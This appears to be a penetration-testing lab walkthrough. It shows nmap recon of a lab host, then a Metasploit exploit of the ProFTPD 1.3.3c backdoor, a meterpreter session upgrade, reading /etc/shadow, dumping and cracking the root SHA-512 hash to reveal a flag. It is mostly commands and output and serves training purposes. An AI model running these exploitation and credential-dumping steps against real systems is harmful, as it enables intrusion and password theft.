- Target IP:
192.75.64.3- Password Hashes dumping -
/etc/shadow
ip -br -c a
192.75.64.2/24nmap -sV 192.75.64.3PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.3c
MAC Address: 02:42:C0:4B:40:03 (Unknown)
Service Info: OS: Unixsearchsploit ProFTPD 1.3.3
service postgresql start && msfconsole -q- Postgresql is started to store all
metasploitloot and sensitive information from the target machine - Metasploit - PostgreSQL Workflows
setg RHOSTS 192.75.64.3
search proftpd
use exploit/unix/ftp/proftpd_133c_backdoor
run/bin/bash -i
- Upgrade the sessions to a
meterpretersession
# background the session with CTRL+Z
sessions -u 1
sessions 2
cat /etc/shadow
📌
root:$6$sgewtGbw$ihhoUYASuXTh7Dmw0adpC7a3fBGkf9hkOQCffBQRMIF8/0w6g/Mh4jMWJ0yEFiZyqVQhZ4.vuS8XOyq.hLQBb.
- Gather Linux Password hashes with
Metasploit
# background the session with CTRL+Z
search hashdump
use post/linux/gather/hashdump
set SESSION 2
run[+] root:$6$sgewtGbw$ihhoUYASuXTh7Dmw0adpC7a3fBGkf9hkOQCffBQRMIF8/0w6g/Mh4jMWJ0yEFiZyqVQhZ4.vuS8XOyq.hLQBb.:0:0:root:/root:/bin/bash
[+] Unshadowed Password File: /root/.msf4/loot/20230323100234_default_192.75.64.3_linux.hashes_660271.txt- The unshadowed password file is a file containing the format hashed password, ready to be cracked.
search crack
use auxiliary/analyze/crack_linux
set SHA512 true
run
Reveal Flag - "root" password is: 🚩
password
